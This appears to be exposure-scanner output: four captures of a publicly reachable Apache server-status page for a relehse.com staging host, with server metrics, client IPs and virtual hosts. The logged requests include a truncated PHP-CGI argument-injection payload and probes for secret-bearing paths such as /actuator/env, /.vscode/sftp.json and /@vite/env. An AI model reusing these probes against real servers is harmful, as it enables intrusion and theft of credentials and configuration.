207.154.212.207http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-2337621010/3/2933_ 0.74116227802690.00.01143.55 134.122.69.252http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-2337621010/1/3392_ 0.351356011697430.00.0093.65 134.122.69.252http/1.1d
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27d62fefbd
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 16-Sep-2025 15:18:24 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 4 days 1 hour 57 minutes 22 seconds Server load: 0.01 0.03 0.05 Total accesses: 167617 - Total Traffic: 4.1 GB - Total Duration: 49916761 CPU Usage: u123.91 s55.63 cu618.8 cs344.55 - .324% CPU load .475 requests/sec - 12.1 kB/second - 25.5 kB/request - 297.802 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03720598no1yes010000 13720595no2yes010001 23720596no0yes010000 33720730no0yes19000 43720597no1yes010000 Sum504 149001 ______________________________________W___________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1937205980/558/2820_ 35.331010523230.010.5079.89 138.68.144.227http/1.1 0-1937205980/471/2846_ 35.37009342270.09.3884.47 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-1937205980/569/3141_ 35.370014804700.016.41142.58 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-1937205980/521/2908_ 35.351013403120.016.2487.29 138.68.144.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-1937205980/799/3048_ 35.340249000340.014.7765.57 138.68.144.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-1937205980/576/3024_ 35.331018639740.023.8477.02 138.68.144.227h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-1937205980/652/3181_ 35.370020719100.08.8756.08 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-1937205980/454/3137_ 35.370011198890.022.79110.90 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-1937205980/599/2975_ 35.37138617164170.08.2862.43 162.158.123.73h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1937205980/621/2903_ 35.35018114212550.024.67101.04 138.68.144.227http/1.1 1-1937205950/877/5741_ 48.511811242550.032.57125.89 138.68.144.227http/1.1 1-1937205950/981/6556_ 48.531116435030.021.68140.11 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 1-1937205950/823/5924_ 48.4911410569090.017.00116.06 162.158.120.218h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1937205950/748/5911_ 48.50021612511390.015.41128.26 104.23.209.85h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1937205950/1012/6078_ 48.43419710721250.022.00119.40 104.23.175.113h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-1937205950/1205/6664_ 48.530015686190.023.43148.52 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-1937205950/1091/6580_ 48.4744732953960.021.33139.69 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1937205950/1153/6910_ 48.530010968380.019.03127.85 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 1-1937205950/986/5770_ 48.490011418420.012.53102.50 162.158.123.110h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1937205950/1196/6630_ 48.5254048796530.019.16105.66 104.23.245.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1937205960/82/1508_ 13.300188316480.02.2629.06 44.193.254.10http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1937205960/157/1572_ 14.6936804229200.01.6543.24 172.71.99.212h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1937205960/88/1719_ 14.69105202370.01.8828.36 138.68.144.227http/1.1 2-1937205960/103/1548_ 14.83004869440.09.55105.74 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-1937205960/105/1715_ 13.33368374877370.02.4950.14 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1937205960/106/1672_ 14.83006693710.02.3758.07 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-1937205960/157/1646_ 14.830011054390.02.7543.64 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 2-1937205960/131/1688_ 14.39003830920.01.8634.29 44.193.254.10http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 2-1937205960/81/1578_ 14.0136808832600.01.6846.89 172.68.134.129h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1937205960/168/1612_ 14.60368011099420.01.1645.30 152.53.239.248http/1.1cinre.tandemhse.com:443GET / HTTP/1.1 3-1937207300/92/3664_ 15.23367176125940.03.1692.71 152.53.239.248http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1937207300/81/3321_ 15.483484211921270.01.30101.27 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1937207300/122/3673_ 15.4734805653230.02.1783.85 172.71.183.14h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1937207300/101/3518_ 15.45367445283410.02.69101.26 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1937207300/105/3423_ 15.4734805088560.02.4865.50 172.71.102.153h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1937207300/101/3685_ 13.6223909402400.02.1799.29 86.54.31.40http/1.1 3-1937207300/105/3600_ 15.532445764418270.01.7085.71 162.158.175.191h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1937207300/114/3599_ 14.2136727547430.03.5872.29 86.54.31.40http/1.1 3-1937207300/153/3356W 15.39005579390.011.1093.79 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-1937207300/131/4295_ 14.9523936315855910.01.5383.89 86.54.31.40http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1937205970/979/2509_ 44.3394386166280.029.3690.69 172.71.146.151h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1937205970/620/1966_ 44.18007306300.016.6550.93 104.23.170.177h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1937205970/819/2274_ 44.03367307280800.021.0145.01 195.76.169.226h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1937205970/846/2438_ 44.33116918600.055.0395.29 138.68.144.227http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-1937205970/793/2178_ 43.9643186535270.017.2538.94 86.54.31.40h2done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1937205970/716/2159_ 43.76406021970.016.0394.85 86.54.31.40http/1.1 4-1937205970/829/2411_ 44.32132510088810.012.7251.33 194.224.96.82h2relehse.com:443idle, streams: 0/1/1/0/0 (open/r
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27e832f73f
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Sunday, 14-Sep-2025 23:44:18 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 14 Parent Server MPM Generation: 13 Server uptime: 2 days 10 hours 23 minutes 15 seconds Server load: 0.27 0.12 0.04 Total accesses: 44748 - Total Traffic: 1.3 GB - Total Duration: 26915854 CPU Usage: u38.4 s32.52 cu258.64 cs177.95 - .241% CPU load .213 requests/sec - 6.6 kB/second - 31.2 kB/request - 601.498 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03641504no0yes010000 13641501no0yes010000 23641502no0yes010000 33641634no0yes19000 43641503no0yes010000 Sum500 149000 _______________________________W__________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1336415040/10/1040_ 7.21280005851530.00.0425.35 172.71.151.29h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1336415040/9/918_ 7.23316701972610.00.1032.47 172.71.150.35h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1336415040/11/1023_ 8.28105351990.00.2786.54 165.22.235.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-1336415040/7/954_ 7.21316708198710.00.0428.01 172.71.151.64h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1336415040/12/1013_ 7.23280022367700.00.1827.41 172.71.151.31h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1336415040/11/955_ 6.993166011532660.00.5217.49 172.68.7.62h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1336415040/8/1025_ 7.213167011496100.00.1519.07 172.71.151.237h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1336415040/8/956_ 7.21402143540.00.0226.83 165.22.235.3h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-1336415040/10/927_ 7.35280551011776200.00.3924.65 104.23.245.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-1336415040/13/995_ 7.213168011190940.00.3125.13 172.71.150.145h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1336415010/26/964_ 7.94200704421110.00.2338.22 172.71.151.182h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1336415010/25/890_ 7.723168011021470.00.3118.71 104.23.248.107h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1336415010/17/1012_ 7.96200715298850.00.1718.02 172.71.150.235h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-1336415010/22/965_ 9.01006758060.00.1948.53 165.22.235.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-1336415010/20/797_ 7.94404399490.00.0315.81 165.22.235.3http/1.1 1-1336415010/25/825_ 8.3520124159939890.00.1727.32 104.23.245.26h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1336415010/21/1250_ 8.36201229126176700.00.0634.21 104.23.245.26h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-1336415010/24/1067_ 7.94316844232260.00.3027.31 172.71.150.184h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1336415010/21/777_ 7.96316704310960.00.4023.56 172.71.150.233h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-1336415010/25/974_ 7.95316703477480.00.2617.10 172.71.150.31h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1336415020/20/525_ 6.6220141946329080.00.279.04 172.71.223.212h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1336415020/15/505_ 8.39201959500.00.6312.84 165.22.235.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-1336415020/9/639_ 7.72201902583110.00.839.65 172.70.142.107h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1336415020/14/542_ 8.39202151170.00.6738.95 165.22.235.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 2-1336415020/17/617_ 7.11206002684390.00.129.11 104.23.248.41h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1336415020/10/523_ 6.55222125840.00.1223.15 172.68.22.218h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1336415020/16/540_ 7.6929508409010.00.449.45 172.69.70.40h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1336415020/10/545_ 6.4220146561517800.00.3410.54 172.69.17.98h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-1336415020/20/539_ 8.2829506324230.00.417.81 152.53.239.248http/1.1cinre.tandemhse.com:443GET / HTTP/1.1 2-1336415020/16/523_ 7.6929506647420.00.8011.39 172.71.22.207h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1336416340/207/1071_ 17.050113771700.02.6037.58 165.22.235.3http/1.1 3-1336416340/215/883W 17.14009424320.02.8336.68 165.22.235.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-1336416340/223/914_ 17.0303742957960.03.7822.31 165.22.235.3http/1.1 3-1336416340/217/884_ 17.15101945690.03.0431.98 165.22.235.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-1336416340/231/859_ 17.15001745120.03.5016.35 165.22.235.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-1336416340/212/1057_ 17.15106554610.03.0945.53 165.22.235.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 3-1336416340/201/977_ 17.0735611950750.03.7525.96 172.71.119.38h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-1336416340/223/949_ 17.14305274100.02.2320.97 165.22.235.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-1336416340/234/831_ 17.14203061290.010.5338.62 165.22.235.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 3-1336416340/212/1120_ 17.132113861190.02.1121.93 165.22.235.3http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-1336415030/216/1024_ 15.8223212601220.03.3621.17 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 4-1336415030/205/935_ 15.7943172589430.02.7715.74 165.22.235.3http/1.1 4-1336415030/213/1067_ 15.712222220220.02.9515.00 64.227.66.237http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1336415030/217/1125_ 15.773252508580.03.4530.23 165.22.235.3http/1.1 4-1336415030/188/1042_ 15.79346432493970.03.9216.36 162.158.123.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-1336415030/190/1023_ 15.75502773100.03.1266.69 165.22.235.3h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 4-1336415030/205/1203_ 15.6422302313880.03.3224.04 152.53.239.248http/1.1relehse.com:443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27aabd9c36
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 13-Sep-2025 17:23:56 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 7 Parent Server MPM Generation: 6 Server uptime: 1 day 4 hours 2 minutes 54 seconds Server load: 0.06 0.06 0.07 Total accesses: 23538 - Total Traffic: 652.4 MB - Total Duration: 12936100 CPU Usage: u54.17 s44.63 cu92.41 cs58.68 - .247% CPU load .233 requests/sec - 6.6 kB/second - 28.4 kB/request - 549.584 ms/request 2 requests currently being processed, 48 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03572157no0yes010000 13572021no0yes010000 23572022no2yes28000 33572023no0yes010000 43572024no0yes010000 Sum502 248000 ___________________________WR_____________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-635721570/354/578_ 25.19204845750.07.1117.42 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-635721570/325/552_ 25.1820987260.08.1520.01 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-635721570/335/613_ 25.19004200300.07.8045.33 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 0-635721570/357/562_ 25.19007151650.08.7711.68 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-635721570/346/575_ 25.13361394080.08.4018.36 167.172.158.128h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-635721570/354/572_ 25.191010683710.07.0210.81 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-635721570/379/582_ 25.13229810506140.08.6412.62 172.70.207.136h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-635721570/345/558_ 25.110201162460.07.7611.33 152.53.239.248http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-635721570/313/536_ 25.191010888030.06.6010.81 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 0-635721570/337/565_ 25.15033410276180.07.0010.95 167.172.158.128http/1.1 1-635720210/14/482_ 12.9410060962960.00.1420.20 104.23.202.92h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-635720210/11/482_ 12.9330201011640.00.037.24 104.23.202.126h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-635720210/18/432_ 12.532111097460.00.126.55 103.23.61.80http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-635720210/19/589_ 12.94201095920.00.8338.78 104.23.202.102h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 1-635720210/17/405_ 12.933020925980.00.265.52 104.23.202.120h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-635720210/14/430_ 12.9330701054780.00.629.76 104.23.202.98h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-635720210/13/712_ 13.1921251192860.00.088.38 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 1-635720210/20/557_ 13.1230701044500.00.947.26 172.71.190.20h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-635720210/16/403_ 12.932101054320.00.0411.00 172.64.194.30h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-635720210/16/515_ 13.2120988650.00.327.31 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 2-635720220/322/396_ 24.49576054350.04.225.84 152.53.239.248http/1.1cinre-backend.tandemhse.com:443GET /server/health HTTP/1.1 2-635720220/305/373_ 24.56001423130.04.906.07 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-635720220/439/518_ 24.545152277090.05.887.50 167.172.158.128h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-635720220/326/421_ 24.5555041924370.06.2736.43 167.172.158.128h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-635720220/401/487_ 24.42502339020.04.786.22 172.70.35.153h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-635720220/311/395_ 24.4645351823370.019.0721.30 167.172.158.128h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-635720220/338/416_ 24.513138147090.04.735.86 167.172.158.128h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 2-635720220/348/431W 24.55001276250.06.477.77 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-635720220/318/394R 24.38174126048280.03.805.38 152.53.239.248http/1.1cinre-backend.tandemhse.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-635720220/317/393_ 24.4435606365020.06.118.10 167.172.158.128http/1.1 3-635720230/17/236_ 14.1040449970.00.0712.06 167.172.158.128http/1.1 3-635720230/15/226_ 14.102690574980.00.2125.96 172.70.175.153h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-635720230/18/232_ 12.682690587680.00.2710.40 172.71.82.27h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-635720230/22/221_ 14.1853467720.00.3717.74 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-635720230/13/205_ 13.852700450480.00.204.39 104.23.202.86h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-635720230/20/229_ 14.102740478850.00.112.75 172.70.38.132h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-635720230/17/218_ 13.842700436430.00.4310.91 104.23.202.118h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-635720230/17/216_ 13.832690474150.00.2411.20 104.23.202.212h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-635720230/14/212_ 13.832690480310.00.145.10 172.69.56.21h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-635720230/21/221_ 14.1050423610.00.366.86 172.71.194.122h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-635720240/92/607_ 15.45301508880.01.567.27 167.172.158.128http/1.1 4-635720240/79/546_ 15.81101536870.01.069.58 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 4-635720240/83/661_ 15.74201251379960.01.348.47 152.53.239.248http/1.1relehse.com:443GET /login HTTP/1.1 4-635720240/84/715_ 15.80311436860.01.349.14 167.172.158.128http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 4-635720240/76/645_ 15.3326901451010.01.198.60 162.158.120.148h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-635720240/78/567_ 15.3426901431440.01.0416.09 162.158.122.179h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 4-635720240/112/822_ 15.4720101348420.01.6610.89 104.23.202.88h2tandemsl.com:443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b272bac15c1
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 13-Sep-2025 01:39:55 CEST Restart Time: Friday, 12-Sep-2025 13:21:02 CEST Parent Server Config. Generation: 5 Parent Server MPM Generation: 4 Server uptime: 12 hours 18 minutes 52 seconds Server load: 0.00 0.09 0.07 Total accesses: 13904 - Total Traffic: 437.0 MB - Total Duration: 3126366 CPU Usage: u12.9 s5.73 cu68.37 cs43.87 - .295% CPU load .314 requests/sec - 10.1 kB/second - 32.2 kB/request - 224.854 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03564249no2yes010002 13564114no0yes19000 23564115no0yes010000 33564116no0yes010000 43564117no0yes010000 Sum502 149002 _______________W__________________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-435642490/51/149_ 5.7610394410.07.509.16 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-435642490/45/150_ 5.65333341610.08.0310.90 167.71.81.114http/1.1 0-435642490/43/194_ 5.73410421580.021.6423.93 167.71.81.114http/1.1 0-435642490/42/132_ 5.7520296650.00.281.59 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 0-435642490/44/152_ 5.68229360690.07.268.71 167.71.81.114h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-435642490/44/143_ 5.7431284990.00.621.99 167.71.81.114http/1.1 0-435642490/40/137_ 5.5840363160.01.223.24 167.71.81.114http/1.1 0-435642490/38/143_ 5.7520339460.00.442.66 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 0-435642490/50/147_ 5.7600425820.01.172.79 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-435642490/33/152_ 5.70313370880.00.652.90 167.71.81.114h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-435641140/2/463_ 1.01300222934880.00.0020.03 104.23.251.83h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-435641140/2/470_ 1.2530501009840.00.007.21 162.158.123.86h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-435641140/2/412_ 1.2930501068050.00.006.42 108.162.245.249h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-435641140/0/568_ 0.0030091088100.00.0037.95 152.53.239.248http/1.1cinre-backend.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-435641140/2/387_ 1.243000923710.00.005.26 172.64.238.11h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-435641140/4/411W 1.24001027450.00.189.09 167.71.81.114http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-435641140/2/694_ 1.2930511173880.00.018.13 108.162.245.243h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-435641140/1/537_ 0.4030001036720.00.006.33 172.70.108.176h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-435641140/4/384_ 1.2530001050630.00.0410.94 152.53.239.248http/1.1cinre.tandemhse.com:443GET / HTTP/1.1 1-435641140/3/497_ 1.293050952860.00.006.98 108.162.245.158h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-435641150/3/72_ 1.323040167370.00.011.61 108.162.245.210h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-435641150/0/66_ 0.0029919110350.00.001.16 162.158.120.219h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-435641150/3/77_ 1.283000111640.00.001.61 162.158.123.25h2tandemsl.com:443idle, streams: 0/3/3/0/0 (open/recv/resp/push/rst) 2-435641150/5/93_ 1.323050237480.00.0430.13 108.162.245.191h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-435641150/5/84_ 1.323000187620.00.061.43 108.162.245.91h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-435641150/1/81_ 0.373011204080.00.012.22 162.158.22.47h2lcftech.es:443done, 